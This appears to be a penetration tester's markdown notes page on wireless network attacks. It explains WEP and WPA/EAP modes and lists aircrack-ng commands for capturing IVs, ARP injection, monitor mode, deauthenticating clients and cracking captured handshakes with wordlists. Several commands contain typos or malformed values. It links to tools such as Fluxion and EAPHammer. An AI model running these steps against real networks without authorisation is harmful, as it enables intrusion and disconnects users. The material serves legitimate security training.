# Wireless pentest

## Open network

* Usually for guest access and only for internet
* The guest can access it directly or they need to authenticate through a portal

## WEP

* This protocol has been completely broken for many years and should not be used anymore.
* We can find the key very easily

```bash
# Capture around 30 000 IV (maybe more)
airodump-ng -c 11 --bssid 60:A4:4C:20:DF:60 -w [OUTPUTFILENAME] wlan0mon
# Generate ARP traffic
aireplay-ng -3 -b 00::09:58:6F:64:1E -h 44:60:57:c8:58:A0 wlan0mon
# Monitor the number of IV with
Aircrack out.cap
# Break the key
Aircrack out.cap
```

## WPA

* 2 authentication modes :
  * Personal = WPA PSK (Pre-Shared Key) = authentification by a secret shared with everyone (like at home)
  * Enterprise = WPA MGT (Management) = EAP (Extensible Authentication Protocol). It is possible to use several different EAP methods (see the official list on the IANA website) but here are the most common versions:
    * PEAP : historically the only protocol supported by Windows, transmits the credentials of the AD via an MSCHAPv2, thus allowing to recover a NetNTLMv2 hash through the Evil-Twin attack.
    * EAP-TTLS : very similar, can authenticate via login/password which can be recovered via the Evil-Twin attack if the clients do not check the certifcat of the access point.
    * EAP-TLS : mutual authentication by certificate.

### The Hacking process

![image](https://user-images.githubusercontent.com/96747355/176039405-619013ff-b308-4ae9-8fcc-80678c51e275.png)

> *Source:* [*Practical Ethical Hacking - TCM Security*](https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course)

```bash
# check if the wireless card is detected
iwconfig
# shut card if necessary
ifconfig wlan0 down
# kill all interference
airmon-ng check kill
# put the card in monitor mode
iwconfig wlan0 mode monitor
# relaunch it
ifconfig wlan0 up
```

#### OR

```bash
# check if the wireless card is detected
iwconfig
# kill all interference
airmon-ng check kill
# put card in monitor mode
airmon-ng start wlan0
# check if it worked
iwconfig
# Find the ssid in our scope for the test
airodump-ng wlan0mon
# monitor our target for handshakes. For -c we need to specify the channel number found with the previous command and for the bssid option we need the mac address we also found with the previous command
airodump-ng -c <channel-number> --bbsid <MAC-ADDRESS> -w outfile 
# sending deauth
airplay-ng -0 1 -a <MAC-ADDRESS> -c <MAC-ADDRESS-STATION> wlanmon0
# check our capture .ap file to crack the handshake
ls capture*
# crack the handshake with a wordlist
aircrack-ng -w wordlist -b <MAC-ADDRESS> capture-NN.cap 
```

## Tools

* [Wifite](https://github.com/derv82/wifite2)
* [Fluxion](https://github.com/FluxionNetwork/fluxion)
* [EAPHammer](https://github.com/s0lst1c3/eaphammer)

## Equipment

* The following are equipment that can be used for wifi pentest
  * Wireless card Alfa AWUD036NH
  * Alfa AWUS1900
  * Alfa AWUS036ACH
  * Alfa AWUS052NH
  * Alfa AWUS051NH
  * Alfa AWUS036NHR
  * TP-Link TL-WN722N
  * Hak5 Pineapple Nano Basic
  * Flipper Zero along with the wifi dev board

## Resources

{% embed url="<https://gbhackers.com/wireless-penetration-testing-checklist-a-detailed-cheat-sheet/>" %}
Wireless pentest checklist
{% endembed %}

{% embed url="<https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/>" %}
PWNING WPA/WPA2 NETWORKS WITH BETTERCAP AND THE PMKID CLIENT-LESS ATTACK - on evilsocket
{% endembed %}

{% embed url="<https://www.aircrack-ng.org/doku.php?id=cracking_wpa>" %}
How to Crack WPA/WPA2
{% endembed %}

{% embed url="<https://www.wirelesshack.org/>" %}
WirelesSHack
{% endembed %}

{% embed url="<https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course>" %}
Practical Ethical Hacking - TCM Security
{% endembed %}